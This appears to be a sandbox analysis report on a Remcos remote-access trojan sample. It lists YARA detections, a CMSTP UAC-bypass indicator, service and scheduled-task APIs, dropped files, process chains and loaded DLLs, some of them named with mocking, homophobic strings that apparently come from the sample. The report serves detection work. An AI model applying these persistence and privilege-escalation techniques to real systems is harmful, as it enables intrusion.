Source: 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: dyfwtd.exe PID: 5516, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

.NET source code contains very large array initializations

Source: 0.2.hCJ8gK9kNn.exe.25b0000.1.raw.unpack, MapAnalyzer.cs

Large array initialization: LinkSetMap: array initializer size 543568

Drops large PE files

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	File dump: OrionLegacyCLI.exe.0.dr 979567344			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	File dump: HardDiskSentinelBin.exe.6.dr 979567142			Jump to dropped file

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

Code function: 0_2_0046DEE0 OpenServiceA,DeleteService,CloseServiceHandle,

0_2_0046DEE0

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_004572FB	0_2_004572FB
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00458283	0_2_00458283
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_004553AB	0_2_004553AB
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_004564DE	0_2_004564DE
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_004566F3	0_2_004566F3
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_004559AF	0_2_004559AF
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00455A63	0_2_00455A63
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00457AD4	0_2_00457AD4
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00457A9C	0_2_00457A9C
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00457B5D	0_2_00457B5D
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00460B10	0_2_00460B10
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00458B21	0_2_00458B21
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00455BF9	0_2_00455BF9
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00455BA2	0_2_00455BA2
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00455C7A	0_2_00455C7A
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00462C20	0_2_00462C20
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00455D26	0_2_00455D26
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00458E12	0_2_00458E12
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00457E2D	0_2_00457E2D
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00455EAD	0_2_00455EAD
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00455FC0	0_2_00455FC0
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: 0_2_00456FC9	0_2_00456FC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09423B88	3_2_09423B88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_094217E8	3_2_094217E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_04DD7158	3_2_04DD7158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_04DD7148	3_2_04DD7148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_04DD42B8	3_2_04DD42B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_04DD1BC0	3_2_04DD1BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0943258B	3_2_0943258B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09438127	3_2_09438127
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09438128	3_2_09438128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0943307F	3_2_0943307F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_094330AF	3_2_094330AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09438521	3_2_09438521
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09565938	3_2_09565938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09564D20	3_2_09564D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09560DD8	3_2_09560DD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09562758	3_2_09562758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09567620	3_2_09567620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09565068	3_2_09565068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_0956A4B0	3_2_0956A4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09562748	3_2_09562748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 3_2_09567611	3_2_09567611

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: String function: 00466CB0 appears 345 times
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: String function: 0045E040 appears 44 times
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: String function: 0047F3E0 appears 49 times
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: String function: 0048472C appears 31 times
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: String function: 0047F326 appears 49 times

Source: hCJ8gK9kNn.exe	Binary or memory string: OriginalFilename vs hCJ8gK9kNn.exe
Source: hCJ8gK9kNn.exe, 00000000.00000002.1702189470.00000000026E6000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameYtzlkwamt.exe" vs hCJ8gK9kNn.exe
Source: hCJ8gK9kNn.exe, 00000000.00000002.1702347831.00000000028F6000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDBServer.EXEB vs hCJ8gK9kNn.exe
Source: hCJ8gK9kNn.exe	Binary or memory string: OriginalFilenameDBServer.EXEB vs hCJ8gK9kNn.exe

Source: hCJ8gK9kNn.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 6.2.dyfwtd.exe.13450000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.dyfwtd.exe.13450000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.dyfwtd.exe.13450000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.dyfwtd.exe.13450000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.dyfwtd.exe.13450000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.dyfwtd.exe.13450000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.dyfwtd.exe.5ab0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.dyfwtd.exe.5ab0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.dyfwtd.exe.5ab0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.dyfwtd.exe.5ab0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.dyfwtd.exe.5ab0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.dyfwtd.exe.5ab0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: dyfwtd.exe PID: 5516, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: 0.2.hCJ8gK9kNn.exe.25b0000.1.raw.unpack, MapAnalyzer.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.hCJ8gK9kNn.exe.25b0000.1.raw.unpack, ResponderElement.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.hCJ8gK9kNn.exe.25b0000.1.raw.unpack, ResponderElement.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.csc.exe.7f5ece8.4.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.csc.exe.7f5ece8.4.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.csc.exe.7f5ece8.4.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.csc.exe.7f5ece8.4.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.csc.exe.7ffed08.1.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.csc.exe.7ffed08.1.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.csc.exe.7ffed08.1.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.3.csc.exe.7ffed08.1.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 3.3.csc.exe.83339e8.5.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 3.3.csc.exe.83339e8.5.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 3.3.csc.exe.83339e8.5.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 3.3.csc.exe.83339e8.5.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 3.3.csc.exe.83339e8.5.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 3.3.csc.exe.83339e8.5.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 3.3.csc.exe.83339e8.5.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 3.3.csc.exe.83339e8.5.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3.3.csc.exe.83339e8.5.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 3.3.csc.exe.83339e8.5.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@6/4@4/3

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

Code function: CreateServiceA,CloseServiceHandle,

0_2_0046DE70

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

Code function: 0_2_004A143E FindResourceA,LoadResource,LockResource,FreeResource,

0_2_004A143E

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

Code function: 0_2_0046DF40 LockServiceDatabase,OpenServiceA,ChangeServiceConfigA,ChangeServiceConfig2A,CloseServiceHandle,UnlockServiceDatabase,GetLastError,QueryServiceLockStatusA,QueryServiceLockStatusA,

0_2_0046DF40

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

File created: C:\Users\user\Videos\OrionLegacy

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Mutant created: \Sessions\1\BaseNamedObjects\mono1234
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Mutant created: \Sessions\1\BaseNamedObjects\jdjgkdgjgkjhh-8DHJNN

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\dyfwtd.exe

Source: Yara match	File source: 6.2.dyfwtd.exe.134d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.csc.exe.83339e8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2147868994.00000000134D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1880838318.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1875083635.0000000008333000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: hCJ8gK9kNn.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: hCJ8gK9kNn.exe

ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

File read: C:\Users\user\Desktop\hCJ8gK9kNn.exe

Source: unknown	Process created: C:\Users\user\Desktop\hCJ8gK9kNn.exe "C:\Users\user\Desktop\hCJ8gK9kNn.exe"
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\dyfwtd.exe C:\Users\user\AppData\Local\Temp\dyfwtd.exe
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Process created: C:\Users\user\AppData\Local\Temp\dyfwtd.exe "C:\Users\user\AppData\Local\Temp\dyfwtd.exe"
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Process created: C:\Users\user\AppData\Local\Temp\dyfwtd.exe "C:\Users\user\AppData\Local\Temp\dyfwtd.exe"	Jump to behavior

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Section loaded: odbc32.dll	Jump to behavior
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Section loaded: crowdstrikeceoisextragay.dll	Jump to behavior
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Section loaded: sentinelisabadedrtrynexttimemaybe.dll	Jump to behavior
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: icmp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dyfwtd.exe	Section loaded: crowdstrikeceoisextragay.dll	Jump to behavior
